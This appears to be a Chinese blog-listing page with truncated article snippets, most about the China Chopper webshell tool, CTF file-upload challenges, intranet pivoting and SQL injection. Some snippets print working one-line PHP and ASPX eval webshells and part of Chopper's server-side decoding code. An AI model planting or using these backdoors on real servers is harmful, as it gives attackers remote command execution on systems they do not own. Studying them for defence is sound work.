中国菜刀的由来: 说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页 ...
分类:
其他好文 时间:
2019-08-31 21:34:03
阅读次数:
549
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境。也可以将其称做为一种网页后门。 1,上传asp或php后门文件-——可以直接用菜刀连接 2,上传图片等文件——需要结合include,包含一个脚本文件,比如xxx.asp,xxx.php,再通过菜刀连接被包含 ...
分类:
Web程序 时间:
2019-08-29 23:18:03
阅读次数:
137
目录 小马:一句话木马也成为小马<?php @eva($_REQUEST['cmd']);?>http://192.168.2.141/dvwa/hackable/uploads/test.php?cmd=phpinfo() ...
分类:
Web程序 时间:
2019-07-23 00:30:48
阅读次数:
193
题目地址:https://www.ichunqiu.com/battalion 创建题目,进入题目环境,看到 文件上传的题型,先试着随便上传一个文件1.txt 直接上传成功了!查看一下源码 看到上传在这个位置,那么接下来就在文件里加一句话木马,然后上传 然后用菜刀链接 但是报错了,好像把php给过滤 ...
分类:
其他好文 时间:
2019-07-07 14:37:36
阅读次数:
155
$V) { if(strstr($v,"base64_decode")) { $v=str_replace("base64_decode(","",$v); $v=str_replace("))",")",$v); } else { if($k==="z0") {$v=base64_decod... ...
分类:
Web程序 时间:
2019-06-16 20:19:59
阅读次数:
205
上篇讲到了我们已经拿到了内网192.168.1.123服务器 拿到192.168.1.123服务器后 要进行内网漫游 需要挂代理 当我们使用菜刀进行信息收集时,发现权限不够,这里就需要提权了 同时发现192.168.1.123开放了3389,445端口,我们可以使用溢出进行提权 这里对挂代理 提权及 ...
分类:
其他好文 时间:
2019-06-09 18:13:05
阅读次数:
80
【中文名称】 [微笑][撇嘴][色][发呆][得意][流泪][害羞][闭嘴][睡][大哭] [尴尬][发怒][调皮][呲牙][惊讶][难过][酷][冷汗][抓狂][吐] [偷笑][愉快][白眼][傲慢][饥饿][困][惊恐][流汗][憨笑][悠闲] [奋斗][咒骂][疑问][嘘][晕][疯了][衰] ...
分类:
微信 时间:
2019-05-20 13:40:18
阅读次数:
1286
aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque ...
分类:
Web程序 时间:
2019-05-17 19:23:10
阅读次数:
656
腾讯视频源:http://v.qq.com/vplus/0ef1d6371912bf6d083dce956f48556c 访问新闻版块,去掉?ID=X的参数以后报错 参数去掉,没有报错,显示正常,说明这个页面代码是没有问题的 1=1 1=2发现页面不仅回显,而且不一样 存在注入漏洞 使用hack b ...
分类:
数据库 时间:
2019-05-05 01:09:09
阅读次数:
162
/* 创建者:菜刀居士的博客 * 创建日期:2014年07月07号 */ namespace Net.CRM.OrganizationService { using System; using Microsoft.Xrm.Sdk; using Microsoft.Xrm.Sdk.Query; /// ...
分类:
其他好文 时间:
2019-05-01 13:34:42
阅读次数:
132
